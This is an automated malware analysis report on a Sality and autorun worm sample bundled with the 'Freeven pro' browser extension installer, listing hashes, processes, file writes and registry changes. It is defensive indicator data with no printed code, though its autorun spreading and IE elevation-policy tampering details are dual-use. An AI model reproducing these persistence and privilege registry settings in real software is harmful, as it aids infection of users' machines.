Win32.Sality.OG (B) (Emsisoft), Win32.Sality.OG (AdAware), VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Worm, Virus, WormAutorun
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 415abb1224ff6404d48545f6388ac3ca
SHA1: 3d2d60a8ce4e5b67c30ea8079d8d257f6acc1cbf
SHA256: 4fbc2dc03f1cc6a403e08229985aff15c861b89424e9be877760b1d7d5f4ed05
SSDeep: 196608:qlZSTsr63ezVpLmpbAgMSSVDh7tpsE2jJ:2xW3ehpGbchLps/F
Size: 7070840 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: AirInstaller
Created at: 2012-12-04 15:55:02
Analyzed on: WindowsXP SP3 32-bit
Summary: Worm. A program that is primarily replicating on networks or removable drives.
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Worm creates the following process(es):
875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe:2560
Qvalysaly.exe:2176
%original file name%.exe:1860
875f2efa-2a31-4c0f-be39-9293cb48929c-4.exe:1180
875f2efa-2a31-4c0f-be39-9293cb48929c-3.exe:508
WINMINE.EXE:1048
WINMINE.EXE:3776
WINMINE.EXE:544
Freeven pro-codedownloader.exe:2144
Freeven pro-codedownloader.exe:720
NOTEPAD.EXE:2288
NOTEPAD.EXE:2120
NOTEPAD.EXE:2332
NOTEPAD.EXE:556
NOTEPAD.EXE:836
NOTEPAD.EXE:2228
NOTEPAD.EXE:3472
NOTEPAD.EXE:2524
NOTEPAD.EXE:2604
NOTEPAD.EXE:3804
NOTEPAD.EXE:2896
NOTEPAD.EXE:3944
NOTEPAD.EXE:1136
NOTEPAD.EXE:3852
NOTEPAD.EXE:2152
NOTEPAD.EXE:296
NOTEPAD.EXE:2516
NOTEPAD.EXE:2188
NOTEPAD.EXE:3896
netsh.exe:2816
netsh.exe:872
notepad.exe:2056
regsvr32.exe:2376
Freeven pro-bg.exe:2444
The Worm injects its code into the following process(es):
netsh.exe:3068
Explorer.EXE:884
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process Qvalysaly.exe:2176 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\update[1].json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\72.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\93.js (793 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\1.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\104.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\ExecDos.dll (5 bytes)
%Program Files%\Freeven pro\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\md5dll.dll (6 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-4.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode\extension.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\14.js (784 bytes)
%Program Files%\Freeven pro\Freeven pro-bg.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\141988 (195663 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\64.js (2 bytes)
%Program Files%\Freeven pro\utils.exe (68126 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\46.js (2 bytes)
%Program Files%\Freeven pro\54248.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\13.js (6 bytes)
%Program Files%\Freeven pro\Freeven pro-codedownloader.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\223.js (453 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-4.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\42.js (6 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-3.job (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\246.js (2 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-3.exe (13122 bytes)
%Program Files%\Freeven pro\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\39.js (4 bytes)
%Program Files%\Freeven pro\360-54248.crx (1425 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-5.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\91.js (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\4.js (3312 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-2.job (70 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-1.job (70 bytes)
%Program Files%\Freeven pro\54248.xpi (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\207.js (1 bytes)
%WinDir%\Tasks\temp_875f2efa-2a31-4c0f-be39-9293cb48929c-2.job (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\191.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins.json (12 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-5.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\37.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\103.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\244.js (501 bytes)
%Program Files%\Freeven pro\Freeven pro.ico (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\InstallerUtils.dll (25776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\462018 (741774 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\17.js (2392 bytes)
%Program Files%\Freeven pro\Freeven pro-bho.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx5.tmp (288023 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\102.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\94.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\update.json (39 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\40.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\39.js (0 bytes)
%WinDir%\Tasks\temp_875f2efa-2a31-4c0f-be39-9293cb48929c-2.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\manifest.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\1.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\104.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\38.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode\extension.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\182.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\14.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\44.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\28.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\35.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\64.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\207.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\13.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\223.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\46.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\22.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\42.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\141988 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\246.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\103.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\94.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\21.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\91.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\242.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\177.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\4.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\43.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\191.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\78.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\2.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode\background.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\36.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\184.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\37.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\45.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\41.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\244.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\update.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\47.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\3.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\93.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\183.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\462018 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\17.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\102.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\72.js (0 bytes)
The process %original file name%.exe:1860 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%WinDir%\system.ini (72 bytes)
%Program Files%\Adobe\Reader 9.0\Reader\READER_SL.EXE (432 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\Jdwqkklr.tmp (217971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\Qvalysaly.exe (861462 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\WrapperUtils.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\rmlukm.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp (232535 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00125F9D_Rar\%original file name%.exe (53142 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\StdUtils.dll (14 bytes)
The Worm deletes the following file(s):
C:\1268b5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\WrapperUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\Jdwqkklr.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\Qvalysaly.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\rmlukm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\StdUtils.dll (0 bytes)
The process Freeven pro-codedownloader.exe:2144 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\220[1].js (19033 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\273[1].js (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\plugins[1].json (4153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\375[1].js (679 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\195[1].js (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\set_campaign_id_m[1].js (508 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\102[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\380[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\200[1].js (807 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\9[1].js (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\233[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\184[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\7[1].js (683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\391[1].js (795 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\193[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\jquery-1_7_1_min[1].js (44457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\246[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\253[1].js (735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\354[1].js (60025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\242[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\334[1].js (967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\376[1].js (1417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\223[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\288[1].js (963 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\app_code[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\180[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\42[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\281[1].js (455 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\390[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\91[1].js (87921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\230[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\221[1].js (413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\345[1].js (645 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\260[1].js (823 bytes)
Registry activity
The process 875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe:2560 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 70 A8 35 12 DD FA 56 E9 E9 FA B5 DB 85 9F 5A"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{974EFC85-F703-400D-9C26-E221ADA87A77}]
"AppName" = "875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe-helper.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B8DE1ED5-AE5C-46B0-977B-DB47DDB4BEB0}]
"AppName" = "875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe-codedownloader.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E09BE7F8-87B7-4C2F-A91B-A1AB8136E2E0}]
"AppPath" = "%Program Files%\Freeven pro"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{974EFC85-F703-400D-9C26-E221ADA87A77}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E09BE7F8-87B7-4C2F-A91B-A1AB8136E2E0}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"{11111111-1111-1111-1111-110511421148}" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{11111111-1111-1111-1111-110511421148}" = "1"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E09BE7F8-87B7-4C2F-A91B-A1AB8136E2E0}]
"AppName" = "875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe-buttonutil.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1D66F07-4C64-4269-A437-CF91D56C0C8}]
"AppPath" = "%Program Files%\Freeven pro"
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{974EFC85-F703-400D-9C26-E221ADA87A77}]
"AppPath" = "%Program Files%\Freeven pro"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B8DE1ED5-AE5C-46B0-977B-DB47DDB4BEB0}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1D66F07-4C64-4269-A437-CF91D56C0C8}]
"AppName" = "875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe-buttonutil64.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B8DE1ED5-AE5C-46B0-977B-DB47DDB4BEB0}]
"AppPath" = "%Program Files%\Freeven pro"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"Timestamp"
The process Qvalysaly.exe:2176 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Freeven pro]
"DisplayVersion" = "1.34.5.4"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn6.tmp\extensionData\,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Freeven pro]
"UninstallString" = "%Program Files%\Freeven pro\Uninstall.exe /fcp=1"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"Freeven pro-bg.exe" = "8000"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Freeven pro\Installer]
"BundledFirefox" = "1"
[HKCU\Software\InstalledBrowserExtensions\Freeven]
"54248" = "Freeven pro"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstalledBrowserExtensions\21636]
"54248" = "Freeven pro"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\InstalledBrowserExtensions\21636\Status]
"Installed" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Freeven pro]
"CrPublisherId" = "21636"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{659b6120-4382-4bc8-90ac-af2cb70f13e4}]
"Policy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{659b6120-4382-4bc8-90ac-af2cb70f13e4}]
"AppPath" = "%Program Files%\Freeven pro"
[HKLM\SOFTWARE\InstalledBrowserExtensions\21636]
"54248" = "Freeven pro"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\InstalledBrowserExtensions\21636\Status]
"Installed" = "1"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{659b6120-4382-4bc8-90ac-af2cb70f13e4}]
"AppName" = "Freeven pro-bg.exe"
